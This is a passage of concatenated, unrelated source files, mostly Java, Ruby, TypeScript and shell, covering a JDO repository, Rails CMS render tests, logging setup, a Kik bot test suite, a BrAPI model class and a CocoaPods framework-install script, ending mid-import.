import javax.jdo.PersistenceManagerFactory;
import com.md.appbrige.appuserconnect.model.Message;
public class MessageRepository {
PersistenceManagerFactory pmfInstance = JDOHelper.getPersistenceManagerFactory("transactions-optional");
public Collection<Message> getAll() {
PersistenceManager pm = pmfInstance.getPersistenceManager();
try {
List<Message> messages = new ArrayList<Message>();
Extent<Message> extent = pm.getExtent(Message.class, false);
for (Message message : extent) {
messages.add(message);
}
extent.closeAll();
return messages;
} finally {
pm.close();
}
}
public void create(Message message) {
PersistenceManager pm = pmfInstance.getPersistenceManager();
try {
pm.makePersistent(message);
} finally {
pm.close();
}
}
public void deleteById(Long id) {
PersistenceManager pm = pmfInstance.getPersistenceManager();
try {
pm.deletePersistent(pm.getObjectById(Message.class, id));
} finally {
pm.close();
}
}
}
|
#!/bin/sh
mkdir /.drive/ps2
ln -s /home/ps2
useradd ps2 -d /home/ps2
cp /home/pi/.bashrc /home/ps2/
cp /home/pi/.profile /home/ps2
chown ps2:ps2 -R /home/ps2
|
<reponame>vasinov/cathouse-frontend
require_relative '../test_helper'
class RenderCmsIntergrationTest < ActionDispatch::IntegrationTest
def setup
super
Rails.application.routes.draw do
get '/render-basic' => 'render_test#render_basic'
get '/render-page' => 'render_test#render_page'
get '/site-path/render-page' => 'render_test#render_page'
get '/render-layout' => 'render_test#render_layout'
end
comfy_cms_layouts(:default).update_columns(:content => '{{cms:page:content}}')
comfy_cms_pages(:child).update_attributes(:blocks_attributes => [
{ :identifier => 'content', :content => 'TestBlockContent' }
])
end
def teardown
Rails.application.reload_routes!
end
def create_site_b
site = Comfy::Cms::Site.create!(
:identifier => 'site-b',
:hostname => 'site-b.test')
layout = site.layouts.create!(
:identifier => 'default',
:content => 'site-b {{cms:page:content}}')
page = site.pages.create!(
:label => 'default',
:layout => layout,
:blocks_attributes => [{ :identifier => 'content', :content => 'SiteBContent' }])
end
class ::RenderTestController < ApplicationController
append_view_path(File.expand_path('../fixtures/views', File.dirname(__FILE__)))
def render_basic
case params[:type]
when 'text'
render :text => 'TestText'
when 'update'
render :update do |page|
page.alert('rendered text')
end
else
render
end
end
def render_page
case params[:type]
when 'page_implicit'
render
when 'page_explicit'
render :cms_page => '/test-page'
when 'page_explicit_with_status'
render :cms_page => '/test-page', :status => 404
when 'page_explicit_with_site'
render :cms_page => '/', :cms_site => 'site-b'
when 'page_explicit_with_blocks'
render :cms_page => '/test-page', :cms_blocks => {
:content => 'custom page content'
}
else
raise 'Invalid or no param[:type] provided'
end
end
def render_layout
@test_value = 'TestValue'
case params[:type]
when 'layout_defaults'
render :cms_layout => 'default'
when 'layout'
render :cms_layout => 'default', :cms_blocks => {
:content => 'TestText',
:content_b => { :partial => 'render_test/test' },
:content_c => { :template => 'render_test/render_layout' }
}
when 'layout_with_status'
render :cms_layout => 'default', :status => 404
when 'layout_invalid'
render :cms_layout => 'invalid'
when 'layout_defaults_with_site'
render :cms_layout => 'default', :cms_site => 'site-b'
when 'layout_with_action'
render :cms_layout => 'default', :action => :new
else
raise 'Invalid or no param[:type] provided'
end
end
def new
end
end
# -- Basic Render Tests ---------------------------------------------------
def test_text
get '/render-basic?type=text'
assert_response :success
assert_equal 'TestText', response.body
end
def test_implicit_cms_page_failure
Comfy::Cms::Site.destroy_all
assert_exception_raised ActionView::MissingTemplate do
get '/render-basic'
end
end
# -- Page Render Test -----------------------------------------------------
def test_implicit_cms_page
page = comfy_cms_pages(:child)
page.update_attributes(:slug => 'render-basic')
get '/render-basic?type=page_implicit'
assert_response :success
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert assigns(:cms_page)
assert_equal page, assigns(:cms_page)
assert_equal 'TestBlockContent', response.body
end
def test_implicit_cms_page_with_site_path
comfy_cms_sites(:default).update_column(:path, 'site-path')
comfy_cms_pages(:child).update_attributes(:slug => 'render-page')
get '/site-path/render-page?type=page_implicit'
assert_response :success
assert_equal 'TestBlockContent', response.body
end
def test_explicit_cms_page
page = comfy_cms_pages(:child)
page.update_attributes(slug: 'test-page')
get '/render-page?type=page_explicit'
assert_response :success
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert assigns(:cms_page)
assert_equal page, assigns(:cms_page)
assert_equal 'TestBlockContent', response.body
end
def test_explicit_cms_page_with_status
page = comfy_cms_pages(:child)
page.update_attributes(:slug => 'test-page')
get '/render-page?type=page_explicit_with_status'
assert_response 404
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert assigns(:cms_page)
assert_equal page, assigns(:cms_page)
assert_equal 'TestBlockContent', response.body
end
def test_explicit_cms_page_failure
page = comfy_cms_pages(:child)
page.update_attributes(:slug => 'invalid')
assert_exception_raised ComfortableMexicanSofa::MissingPage do
get '/render-page?type=page_explicit'
raise Rails.env.to_s
end
end
def test_explicit_with_site
create_site_b
get '/render-page?type=page_explicit_with_site'
assert_response :success
assert assigns(:cms_site)
assert_equal 'site-b', assigns(:cms_site).identifier
assert_equal 'site-b SiteBContent', response.body
end
def test_explicit_with_site_failure
assert_exception_raised ComfortableMexicanSofa::MissingSite do
get '/render-page?type=page_explicit_with_site'
end
end
def test_explicit_with_page_blocks
page = comfy_cms_pages(:child)
page.update_attributes(slug: 'test-page')
get '/render-page?type=page_explicit_with_blocks'
assert_response :success
assert_equal 'custom page content', response.body
end
# -- Layout Render Tests --------------------------------------------------
def test_cms_layout_defaults
get '/render-layout?type=layout_defaults'
assert_response :success
assert_equal 'TestTemplate TestValue', response.body
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert_equal comfy_cms_layouts(:default), assigns(:cms_layout)
end
def test_cms_layout
comfy_cms_layouts(:default).update_columns(:content => '{{cms:page:content}} {{cms:page:content_b}} {{cms:page:content_c}}')
get '/render-layout?type=layout'
assert_response :success
assert_equal 'TestText TestPartial TestValue TestTemplate TestValue', response.body
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert_equal comfy_cms_layouts(:default), assigns(:cms_layout)
end
def test_cms_layout_with_status
get '/render-layout?type=layout_with_status'
assert_response 404
assert_equal 'TestTemplate TestValue', response.body
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert_equal comfy_cms_layouts(:default), assigns(:cms_layout)
end
def test_cms_layout_with_action
comfy_cms_layouts(:default).update_columns(:content => '{{cms:page:content}} {{cms:page:content_b}} {{cms:page:content_c}}')
get '/render-layout?type=layout_with_action'
assert_response :success
assert_equal "Can render CMS layout and specify action\n ", response.body
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert_equal comfy_cms_layouts(:default), assigns(:cms_layout)
end
def test_cms_layout_failure
assert_exception_raised ComfortableMexicanSofa::MissingLayout do
get '/render-layout?type=layout_invalid'
end
end
def test_cms_layout_defaults_with_site
create_site_b
get '/render-layout?type=layout_defaults_with_site'
assert_response :success
assert assigns(:cms_site)
assert_equal 'site-b', assigns(:cms_site).identifier
assert_equal 'site-b TestTemplate TestValue', response.body
end
def test_cms_layout_defaults_with_site_failure
assert_exception_raised ComfortableMexicanSofa::MissingSite do
get '/render-layout?type=layout_defaults_with_site'
end
end
end
|
<gh_stars>1-10
# This initializer will catch the use of deprecated gqueries. Since there can be thousands of events
# we should decide what to do with them. At the moment I'm just showing them on the log. We could
# save them to a separate log file or store them externally and use a gquery counter.
#
if Rails.root.join('log').directory?
GqlLogger = Logger.new(Rails.root.join('log/gql.log'), 5, 1_048_576)
GqlWarnings = Logger.new(Rails.root.join('log/warnings.log'), 5, 1_048_576)
# For quick debugging sessions
DebugLogger = Logger.new(Rails.root.join('log/debug.log'), 5, 1_048_576)
else
# This only happens during a cold deploy, when running a setup Rake task
# before the shared directories are symlinked.
GqlLogger = Logger.new($stderr)
GqlWarnings = Logger.new($stderr)
DebugLogger = Logger.new($stderr)
end
GqlWarnings.formatter = GqlLogger.formatter =
proc do |severity, datetime, progname, message|
progname = " #{ progname }" unless progname.nil?
"[#{ datetime }#{ progname }] #{ message }\n"
end
ActiveSupport::Notifications.subscribe 'gql.gquery.deprecated' do |name, start, finish, id, payload|
GqlLogger.info "gql.gquery.deprecated: #{payload}"
end
ActiveSupport::Notifications.subscribe 'gql.debug' do |name, start, finish, id, payload|
GqlLogger.debug "gql.debug: #{payload}"
end
# Show all 'performance' related outputs
ActiveSupport::Notifications.subscribe /^warn/ do |name|
GqlWarnings.warn name
end
# Show all 'performance' related outputs
ActiveSupport::Notifications.subscribe /\.performance/ do |name, start, finish, id, payload|
GqlLogger.debug "#{(name+":").ljust(80)} #{(finish - start).round(3).to_s.ljust(5)} s"
end
ActiveSupport::Notifications.subscribe /etsource.loader/ do |name, start, finish, id, payload|
GqlLogger.debug "#{(name+":").ljust(80)} #{(finish - start).round(3).to_s.ljust(5)} s"
end
ActiveSupport::Notifications.subscribe /qernel.merit_order/ do |name, start, finish, id, payload|
GqlLogger.debug "#{(name+":").ljust(80)} #{(finish - start).round(3).to_s.ljust(5)} s"
end
ActiveSupport::Notifications.subscribe /gql\.query/ do |name, start, finish, id, payload|
GqlLogger.debug "#{(name+":").ljust(80)} #{(finish - start).round(3).to_s.ljust(5)} s"
end
ActiveSupport::Notifications.subscribe /gql\.inputs/ do |name, start, finish, id, payload|
GqlLogger.debug "#{name}: #{payload}"
end
def dbg(x)
DebugLogger.debug x
end
|
terraform() {
cat <<EOF
provider "aws" {
region = "$REGION"
}
resource "aws_subnet" "$NAME" {
vpc_id = "$VPC_ID"
cidr_block = "10.0.1.0/24" # Replace with the desired CIDR block for the subnet
# Add any other necessary subnet configurations here
}
EOF
} |
<reponame>divBis0/KodalySongDatabase
var ToneKeyboard = {};
jQuery(function($) {
ToneKeyboard.options = {
layout: 'custom',
customLayout: {
'normal' : [
// "n(a):title_or_tooltip"; n = new key, (a) = actual key, ":label" = title_or_tooltip (use an underscore "_" in place of a space " ")
'd(d):do r(r):re m(m):mi f(f):fa s(s):so l(l):la t(t):ti',
'{shift}'
],
'shift' : [
'\u24d3(D):circled_do(D) \u24e1(R):circled_re(R) \u24dc(M):circled_mi(M) \u24d5(F):circled_fa(F) \u24e2(S):circled_so(S) \u24db(L):circled_la(L) \u24e3(T):circled_ti(T)',
'{shift}'
]
},
css : {
container : 'ui-widget-content ui-widget ui-corner-all ui-helper-clearfix ui-tone_set-keyboard'
},
tabNavigation : true,
autoAccept : true,
usePreview: false // no preveiw
};
}); |
#!/usr/bin/env bash
ceph_mon_ip=10.250.20.11
ceph_user=u18-k8s
ssh root@${ceph_mon_ip} ceph auth print-key client.${ceph_user}
|
import { Component, OnInit } from '@angular/core';
import { User, Video, UserStats } from 'src/app/models';
import { AdminService } from 'src/app/services';
@Component({
selector: 'admin-users-chart',
templateUrl: './admin-users-chart.component.html'
})
export class AdminUsersChartComponent implements OnInit {
users: UserStats[] = [];
constructor(private adminService: AdminService) { }
async ngOnInit() {
this.users = await this.adminService.getUsersChart().toPromise();
}
}
|
<reponame>silentsoft/silentsoft-ui
package org.silentsoft.oss;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import org.junit.Assert;
import org.junit.Test;
import org.silentsoft.oss.license.BSD3ClauseLicense;
import org.silentsoft.oss.license.MITLicense;
public class NoticeFileTest {
private static final License BSD_3_CLAUSE = new BSD3ClauseLicense();
private static final License MIT_LICENSE = new MITLicense();
@Test
public void noticeFileTest() throws Exception {
String markdown = generateSilentsoftUiNoticeMarkdown();
System.out.println("--------START OF THE NOTICE FILE--------");
System.out.println(markdown);
System.out.println("---------END OF THE NOTICE FILE---------");
Assert.assertEquals(markdown, readFile());
}
private String generateSilentsoftUiNoticeMarkdown() {
return NoticeFileGenerator.newInstance("silentsoft-ui", "silentsoft.org")
.addText("This product includes software developed by The Apache Software Foundation (http://www.apache.org/).")
.addLibrary("controlsfx 8.40.16", "https://github.com/controlsfx/controlsfx", BSD_3_CLAUSE)
.addLibrary("slf4j-api 1.7.25", "https://github.com/qos-ch/slf4j", MIT_LICENSE)
.generate();
}
private String readFile() throws Exception {
return String.join("\r\n", Files.readAllLines(Paths.get(System.getProperty("user.dir"), "NOTICE.md"), StandardCharsets.UTF_8));
}
}
|
import { DocumentNode } from 'graphql';
import { GraphQLClient } from 'graphql-request';
import { print } from 'graphql/language/printer';
import { action, computed, observable, runInAction } from 'mobx';
import { AbortablePromise } from '../AbortablePromise';
export class GraphQLRequest<TResult, TVariables> {
@observable public result: TResult | null = null;
@observable public isExecuting: boolean = false;
@observable public hasBeenExecutedAtLeastOnce: boolean = false;
@observable public error: Error | null = null;
@observable public execution: AbortablePromise<TResult, any> | null = null;
@computed public get isExecutingTheFirstTime() {
return this.isExecuting && !this.hasBeenExecutedAtLeastOnce;
}
private client: GraphQLClient;
private query: DocumentNode;
constructor(client: GraphQLClient, query: DocumentNode) {
this.client = client;
this.query = query;
}
@action public async execute(variables: TVariables): Promise<TResult | null> {
if (this.execution?.isExecuting) {
this.execution?.abort();
}
this.isExecuting = true;
this.execution = new AbortablePromise(
this.client.request(print(this.query), variables)
);
try {
const result = await this.execution;
runInAction(() => {
this.result = result;
this.error = null;
});
return result;
} catch (error) {
if (error === AbortablePromise.ABORT_ERROR) {
runInAction(() => {
this.result = null;
this.error = null;
});
return null;
} else {
runInAction(() => {
this.result = null;
this.error = error;
});
throw error;
}
} finally {
runInAction(() => {
this.isExecuting = false;
this.hasBeenExecutedAtLeastOnce = true;
});
}
}
}
export type GraphQLRequestVariables<Request> = Request extends GraphQLRequest<
any,
infer Variables
>
? Variables
: never;
|
<filename>sync/sched.go
// @Author : Lik
// @Time : 2021/1/26
package main
import (
"runtime"
"sync"
)
func TestSchedDemo() {
wg := new(sync.WaitGroup)
wg.Add(4)
go func() {
defer wg.Done()
for i := 0; i < 6; i++ {
println(i)
if i == 3 {
runtime.Gosched()
}
}
}()
go func() {
defer wg.Done()
println("Hello, World - 1")
}()
go func() {
defer wg.Done()
println("Hello, World - 2")
}()
go func() {
defer wg.Done()
println("Hello, World - 3")
}()
wg.Wait()
}
|
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ic_outbond_twotone = void 0;
var ic_outbond_twotone = {
"viewBox": "0 0 24 24",
"children": [{
"name": "rect",
"attribs": {
"fill": "none",
"height": "24",
"width": "24",
"x": "0",
"y": "0"
},
"children": []
}, {
"name": "path",
"attribs": {
"d": "M12,4c-4.41,0-8,3.59-8,8c0,4.41,3.59,8,8,8s8-3.59,8-8C20,7.59,16.41,4,12,4z M13.88,11.54l-4.96,4.96 l-1.41-1.41l4.96-4.96L10.34,8l5.65,0.01L16,13.66L13.88,11.54z",
"opacity": ".3"
},
"children": []
}, {
"name": "path",
"attribs": {
"d": "M12,4c4.41,0,8,3.59,8,8s-3.59,8-8,8s-8-3.59-8-8S7.59,4,12,4 M12,2C6.48,2,2,6.48,2,12c0,5.52,4.48,10,10,10s10-4.48,10-10 C22,6.48,17.52,2,12,2L12,2z M13.88,11.54l-4.96,4.96l-1.41-1.41l4.96-4.96L10.34,8l5.65,0.01L16,13.66L13.88,11.54z"
},
"children": []
}]
};
exports.ic_outbond_twotone = ic_outbond_twotone; |
<filename>test/com/twu/biblioteca/CustomerTest.java
package com.twu.biblioteca;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import static org.hamcrest.core.Is.is;
import static org.junit.Assert.assertThat;
/**
* Created by alexa on 4/02/2019.
*/
public class CustomerTest {
Customer cust;
@Rule
public final ExpectedException failure = ExpectedException.none();
@Test
public void shouldPrintCustomerDetailsCorrectly() {
cust = new Customer("123-1234", "name", "0410123456", "<EMAIL>", "");
String expected =
"\n" +
"Library Number: 123-1234\n" +
"Name: name\n" +
"Phone: 0410123456\n" +
"Email: <EMAIL>\n" +
"\n";
assertThat(cust.printDetails(), is(expected));
}
@Test
public void shouldThrowWrongUserDetailsExceptionWithLibNumberError() {
cust = new Customer();
assertThat(cust.checkLibNumberPattern("123-123"), is(false));
}
}
|
# ----------------------------------------------------------------------------
#
# Package : client-java-api
# Version : 6.0.1 / 8.0.0
# Source repo : https://github.com/kubernetes-client/java
# Tested on : UBI 8.5
# Language : Java
# Travis-Check : True
# Script License: Apache License, Version 2 or later
# Maintainer : Saurabh Gore <Saurabh.Gore@ibm.com>
#
# Disclaimer: This script has been tested in root mode on given
# ========== platform using the mentioned version of the package.
# It may not work as expected with newer versions of the
# package and/or distribution. In such case, please
# contact "Maintainer" of this script.
#
# ----------------------------------------------------------------------------
set -e
WORK_DIR=`pwd`
PACKAGE_NAME=java
PACKAGE_VERSION=${1:-client-java-parent-8.0.0}
PACKAGE_URL=https://github.com/kubernetes-client/java.git
# Install required dependencies
yum install -y git maven java-1.8.0-openjdk-devel
#Clonning repo
git clone $PACKAGE_URL
cd $PACKAGE_NAME/
git checkout $PACKAGE_VERSION
cd kubernetes
#Build without tests
mvn install -DskipTests
#To execute tests
if ! mvn test ; then
echo "------------------Build Success but test fails---------------------"
else
echo "------------------Build and test success-------------------------"
fi
|
#!/bin/sh
set -e
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# use filter instead of exclude so missing patterns dont' throw errors
echo "rsync -av --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync -av --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identitiy
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements '$1'"
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
code_sign_cmd="$code_sign_cmd &"
fi
echo "$code_sign_cmd"
eval "$code_sign_cmd"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current file
archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | rev)"
stripped=""
for arch in $archs; do
if ! [[ "${VALID_ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
}
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "$BUILT_PRODUCTS_DIR/CSPhotos/CSPhotos.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "$BUILT_PRODUCTS_DIR/CSPhotos/CSPhotos.framework"
fi
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
wait
fi
|
<reponame>gitnooji/nj-kik-controller
'use strict';
let nock = require('nock');
let request = require('supertest');
let assert = require('assert');
let Bot = require('../index.js');
const BOT_USERNAME = 'testbot';
const BOT_API_KEY = '2042cd8e-638c-4183-aef4-d4bef6f01981';
describe('Get user profile info', () => {
it('fetches', (done) => {
let bot = new Bot({
username: BOT_USERNAME,
apiKey: BOT_API_KEY,
skipSignatureCheck: true
});
let engine = nock('https://api.kik.com')
.get('/v1/user/testuser1')
.reply(200, {
firstName: 'Gwendolyn',
lastName: 'Ferguson',
profilePicUrl: 'https://randomuser.me/api/portraits/women/21.jpg',
profilePicLastModified: 1458959883
});
bot.getUserProfile('testuser1')
.then((profile) => {
assert.equal(profile.username,
'testuser1');
assert.equal(profile.displayName,
'<NAME>');
assert.equal(profile.firstName,
'Gwendolyn');
assert.equal(profile.lastName,
'Ferguson');
assert.equal(profile.profilePicUrl,
'https://randomuser.me/api/portraits/women/21.jpg');
assert.equal(profile.profilePicLastModified,
1458959883);
done();
}, (err) => {
assert.fail(err);
});
});
it('fetches multiple at the same time', (done) => {
let bot = new Bot({
username: BOT_USERNAME,
apiKey: BOT_API_KEY,
skipSignatureCheck: true
});
let engine = nock('https://api.kik.com')
.get('/v1/user/testuser1')
.reply(200, {
firstName: 'Test',
lastName: 'Guy',
})
.get('/v1/user/testuser2')
.reply(200, {
firstName: 'Test2',
lastName: 'Guy',
});
bot.getUserProfile(['testuser1', 'testuser2'])
.then((profiles) => {
const profile1 = profiles[0];
const profile2 = profiles[1];
assert.equal(profile1.username, 'testuser1');
assert.equal(profile1.displayName, 'Test Guy');
assert.equal(profile1.firstName, 'Test');
assert.equal(profile1.lastName, 'Guy');
assert.equal(profile2.username, 'testuser2');
assert.equal(profile2.displayName, 'Test2 Guy');
assert.equal(profile2.firstName, 'Test2');
assert.equal(profile2.lastName, 'Guy');
done();
}, (err) => {
assert.fail(err);
});
});
it('fails when user does not exist', (done) => {
let bot = new Bot({
username: BOT_USERNAME,
apiKey: BOT_API_KEY,
skipSignatureCheck: true
});
let engine = nock('https://api.kik.com')
.get('/v1/user/testuser12')
.reply(404);
bot.getUserProfile('testuser12')
.then((profile) => {
assert.fail('Profile should not exist');
}, (err) => {
done();
});
});
it('can be converted to JSON after being fetched', (done) => {
let bot = new Bot({
username: BOT_USERNAME,
apiKey: BOT_API_KEY,
skipSignatureCheck: true
});
let engine = nock('https://api.kik.com')
.get('/v1/user/testuser1')
.reply(200, {
firstName: 'Gwendolyn',
lastName: 'Ferguson',
profilePicUrl: 'https://randomuser.me/api/portraits/women/21.jpg',
profilePicLastModified: 1458959883
});
bot.getUserProfile('testuser1')
.then((profile) => {
let json = profile.toJSON();
assert.deepEqual(json, {
firstName: 'Gwendolyn',
lastName: 'Ferguson',
profilePicUrl: 'https://randomuser.me/api/portraits/women/21.jpg',
profilePicLastModified: 1458959883
});
done();
}, (err) => {
assert.fail(err);
});
});
});
|
package modele;
/*
Enum : DistributionType
------------------------------------------
Constantes liées à l'algorithme de remplissage
du vaisseau suivant différentres stratégies.
Possibilités : Naif, Packet, Life_focus
*/
public enum FillingType {
NAIVE,
PACKET,
LIFE_FOCUS,
MORE_SPACE;
/*
Méthode : fromText(value)
------------------------------------------
Permet de convertir une référence en texte vers
une constante que le simulateur va pouvoir interpréter...
value(String): le texte à parser
returns: constante correspondant au texte
*/
public static FillingType fromText(String value) {
switch(value) {
case "Je réparti le matériel":
case "chair à canon":
return FillingType.NAIVE;
case "Je bourre":
return FillingType.PACKET;
case "priorité vie humaine":
return FillingType.LIFE_FOCUS;
}
return null;
}
/*
Méthode : toText(value)
------------------------------------------
Permet de convertir une constante vers un texte
qui sera plus agréable à lire pour l'utilisateur
returns: texte correspondant à la constante
*/
public String toText() {
switch (this) {
case NAIVE:
return "Je réparti le matériel";
case PACKET:
return "Je bourre";
}
return null;
}
} |
#!/usr/bin/env python3
import random
#for i in range(180):
while True:
title = input()
print("{0:.2f} {1}".format(random.uniform(1, 101), title))
|
<reponame>agus-setiawan-desu/brapi-Java-TestServer
package io.swagger.model.germ;
import java.util.Objects;
import com.fasterxml.jackson.annotation.JsonProperty;
import io.swagger.annotations.ApiModelProperty;
import org.springframework.validation.annotation.Validated;
/**
* CrossParent
*/
@Validated
@javax.annotation.Generated(value = "io.swagger.codegen.v3.generators.java.SpringCodegen", date = "2020-03-20T16:33:36.513Z[GMT]")
public class CrossParent {
@JsonProperty("germplasmDbId")
private String germplasmDbId = null;
@JsonProperty("germplasmName")
private String germplasmName = null;
@JsonProperty("observationUnitDbId")
private String observationUnitDbId = null;
@JsonProperty("observationUnitName")
private String observationUnitName = null;
@JsonProperty("parentType")
private ParentType parentType = null;
public CrossParent germplasmDbId(String germplasmDbId) {
this.germplasmDbId = germplasmDbId;
return this;
}
/**
* the unique identifier for a germplasm
* @return germplasmDbId
**/
@ApiModelProperty(example = "d34b10c3", value = "the unique identifier for a germplasm")
public String getGermplasmDbId() {
return germplasmDbId;
}
public void setGermplasmDbId(String germplasmDbId) {
this.germplasmDbId = germplasmDbId;
}
public CrossParent germplasmName(String germplasmName) {
this.germplasmName = germplasmName;
return this;
}
/**
* the human readable name for a germplasm
* @return germplasmName
**/
@ApiModelProperty(example = "TME_419", value = "the human readable name for a germplasm")
public String getGermplasmName() {
return germplasmName;
}
public void setGermplasmName(String germplasmName) {
this.germplasmName = germplasmName;
}
public CrossParent observationUnitDbId(String observationUnitDbId) {
this.observationUnitDbId = observationUnitDbId;
return this;
}
/**
* the unique identifier for an observation unit
* @return observationUnitDbId
**/
@ApiModelProperty(example = "2e1926a7", value = "the unique identifier for an observation unit")
public String getObservationUnitDbId() {
return observationUnitDbId;
}
public void setObservationUnitDbId(String observationUnitDbId) {
this.observationUnitDbId = observationUnitDbId;
}
public CrossParent observationUnitName(String observationUnitName) {
this.observationUnitName = observationUnitName;
return this;
}
/**
* the human readable name for an observation unit
* @return observationUnitName
**/
@ApiModelProperty(example = "my_Ibadan_Plot_9001", value = "the human readable name for an observation unit")
public String getObservationUnitName() {
return observationUnitName;
}
public void setObservationUnitName(String observationUnitName) {
this.observationUnitName = observationUnitName;
}
public CrossParent parentType(ParentType parentType) {
this.parentType = parentType;
return this;
}
/**
* The type of parent ex. 'MALE', 'FEMALE', 'SELF', 'POPULATION', etc.
* @return parentType
**/
@ApiModelProperty(example = "MALE", value = "The type of parent ex. 'MALE', 'FEMALE', 'SELF', 'POPULATION', etc.")
public ParentType getParentType() {
return parentType;
}
public void setParentType(ParentType parentType) {
this.parentType = parentType;
}
@Override
public boolean equals(java.lang.Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
CrossParent crossParent = (CrossParent) o;
return Objects.equals(this.germplasmDbId, crossParent.germplasmDbId) &&
Objects.equals(this.germplasmName, crossParent.germplasmName) &&
Objects.equals(this.observationUnitDbId, crossParent.observationUnitDbId) &&
Objects.equals(this.observationUnitName, crossParent.observationUnitName) &&
Objects.equals(this.parentType, crossParent.parentType);
}
@Override
public int hashCode() {
return Objects.hash(germplasmDbId, germplasmName, observationUnitDbId, observationUnitName, parentType);
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("class CrossParent {\n");
sb.append(" germplasmDbId: ").append(toIndentedString(germplasmDbId)).append("\n");
sb.append(" germplasmName: ").append(toIndentedString(germplasmName)).append("\n");
sb.append(" observationUnitDbId: ").append(toIndentedString(observationUnitDbId)).append("\n");
sb.append(" observationUnitName: ").append(toIndentedString(observationUnitName)).append("\n");
sb.append(" parentType: ").append(toIndentedString(parentType)).append("\n");
sb.append("}");
return sb.toString();
}
/**
* Convert the given object to string with each line indented by 4 spaces
* (except the first line).
*/
private String toIndentedString(java.lang.Object o) {
if (o == null) {
return "null";
}
return o.toString().replace("\n", "\n ");
}
}
|
module.exports = {
PORNSTARS_LIST: '#pornstarsSearchResult li .wrap',
pornstars_search_selectors: {
ACTOR: '.title',
VIDEO_NUMBER: '.videosNumber',
VIEW_NUMBER: '.pstarViews',
RANK: '.rank_number'
},
pornstars_element_attributs: {
LINK: 'href',
TITLE: 'title',
HD: null,
DURATION: 'innerHTML',
VIEWS: 'innerHTML',
PREMIUM: null,
AUTHOR: 'innerHTML',
RATINGS: 'innerHTML',
RELATED_SEARCH: 'multi_textContent',
RELATED_PORNSTARS: 'multi_textContent',
ACTOR: 'innerHTML',
VIDEO_NUMBER: 'innerHTML',
VIEW_NUMBER: 'innerHTML',
RANK: 'innerHTML'
}
};
|
package top.yifan.template.exception;
import java.net.URI;
/**
* ErrorConstants
*
* @author star
*/
public final class ErrorConstants {
public static final String ERR_CONCURRENCY_FAILURE = "error.concurrencyFailure";
public static final String ERR_VALIDATION = "error.validation";
public static final URI DEFAULT_TYPE = null;
private ErrorConstants() {
}
} |
package com.margsapp.messenger.Settings;
import android.app.Activity;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.content.res.Configuration;
import android.os.Bundle;
import android.view.View;
import android.widget.ImageView;
